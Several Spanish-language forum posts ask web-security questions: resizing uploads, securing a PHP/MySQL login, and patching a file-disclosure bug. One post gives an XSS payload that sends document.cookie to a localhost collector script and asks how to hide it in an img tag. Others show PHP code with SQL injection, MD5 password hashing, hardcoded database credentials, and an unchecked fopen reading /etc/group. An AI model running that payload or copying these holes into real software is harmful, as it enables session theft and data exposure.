Hola buenas,
Bueno pues tengo una duda,

estoy haciendo una web en la que lo usuarios pueden subir fotos, pero lo que quiero es que se queden todas iguales y a ser posible escribir un mensaje en la imagen (por ejemplo el nombre de la web). Se podría hacer que al subirse ya se redimensine y se guarde?

Si alguién lo ha hecho alguna vez, le agradecería si me podría prestar el código.

Un saludo y gracias de antemano.

Bueno me he puesto a leer un poco sobre XSS y hacer pruebas en mi localhost, hize un script vulnerable a XSS (vuln.php) y otro que recoge la cookie (xss.php) por la variable 'cookie'.

Entonces si entraría a:
http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>

en un archivo llamado log.html se me escribiría la cookie, bien...
No podría meter ese enlace entre etiquetas <img> por ejemplo:

prueba.html
<img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">

para que cuando habra prueba.html se envie la petición get con esa url y se guarde la cookie menos sospechosamente?

Intente hacerlo asi y no me rulo, pase la url por urlencode() y tampoco.

Un saludo y gracias de antemano 

Hola buenas!

Bueno estaba haciendo un login para mi web con php, mysql.
Bueno por ejemplo:

<form action="/index.php" method="post">
	<p>
	  <input type="text" name="usuario" value="Nombre usuario" onClick="this.value=''"> 
    </p>
	<p><br>
      <input type="password" name="clave" value="Password" onClick="this.value=''"> 
	  <br>
	  <br> 
      <input type="submit" name="enviar" value="Enviar">
 
    </p>
</form>

compruebo que si $_POST['enviar'] tiene valor, cogo $_POST['usuario'] y $_POST['clave'], envio la consulta a la db, si me devuelve algun resultado, creo una session, sino muestro el típico error.

Entonces cualquier persona malintencionada que vería el login de mi web, podría ver los nombres de los campos que uso para enviar el usuario, password (en el fuente html), el error que muestra al no hacer login, hacerse un pequeño script en perl o en lo que sea y enviar valores mediante peticiones POST a los campos hasta obtener usuario, password...

Soluciones??
pues sí, se podría usar captcha, una tabla en la db que guarde los logins fallidos por ip, si hace 3 o los que sea bloquee la ip y tal...

Alguien sabe hacerlo de otra forma y que sea seguro?

Un saludo y gracias de antemano...

hola a todos
estoy creando un sistema de login para mi web pero veo que me estoy liando y nose de que forma hacerlo seguro, esto es lo que llevo hecho:

esta es la tabla SQL:

CREATE TABLE users(
id INT NOT NULL AUTO_INCREMENT,
PRIMARY KEY(id),
username VARCHAR(30) NOT NULL,
password VARCHAR(20) NOT NULL);
 
-- USERS --
INSERT INTO `users` VALUES (1, 'admin', '827ccb0eea8a706c4c34a16891f84e7b');

Aquí el code php (login.php):

<?php
 
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '12345';
$db 	= 'web';
 
$conectar = mysql_connect($dbhost,$dbuser,$dbpass); 
mysql_select_db($db,$conectar);
 
if (isset($_SESSION['admin_username'])){
	echo "Ya estás autentificado";
        header("Location: admin.php");
}
 
if ($_POST['username']) {
	$username = $_POST['username'];
	$password = $_POST['password'];
 
 
	if ($password==NULL) {
		echo "La password no fue enviada";
	}
 
	else{
		$query = mysql_query("SELECT username,password FROM users WHERE username = '$username'") or die(mysql_error());
		$data = mysql_fetch_array($query);
		if($data['password'] != md5($password)) {
			echo "Login incorrecto";
		}
 
		$query = mysql_query("SELECT username,password FROM users WHERE username = '$username'") or die(mysql_error());
		$row = mysql_fetch_array($query);
		$_SESSION["admin_username"] = $row['username'];
		echo "Has sido logueado correctamente ".$_SESSION['admin_username']." y puedes acceder al admin.php.";
		}
	}
?>
 
 
<form action='login.php' method='POST'>
<table style='border:1px solid #000000;'>
<tr>
<td align='right'>
Nombre de usuario: <input type='text' size='15' maxlength='25' name='username'>
</td>
</tr>
<tr>
<td align='right'>
Password: <input type='password' size='15' maxlength='25' name='password'>
</td>
</tr>
<tr>
<td align='center'>
<input type="submit" value="Login">
</td>
</tr>
<tr>
<td align='center'>
</td>
</tr>
</table>
</form>

Creo que me estoy complicando bastante para lo que quiero hacer, tambien hay un par de SQL Injections por ahí... ¿Como lo podría mejorar? ¿Qué cambiarian del código? ¿Cómo lo puedo hacer más seguro?

cheers!

Hola buenas.

¿De que manera podría parchear un Remote File Disclosure?
Ejemplo código:

<?php
 
$filename = $_GET['filename'];
$fp = fopen($filename, 'r');
$doc = fread($fp, filesize($file));
echo $doc;
 
?>

Con este tipo de fallo el atacante podría leer cualquier archivo de texto plano:
http://localhost/archivovulnerable.php?filename=/etc/group

¿Qué formas habría de solucionar este fallo?

Salu2

Hola buenas tenia idea de comprar una tarjeta con el chip "Zydas 1211b" y una antena de 9 dBi omnidireccional. ¿Qué les parece ese chip? Sirve para auditoria wireless? Puedo usar la tarjeta para conectarme desde windows y linux? Sobre que precio podría salir?

Saludos.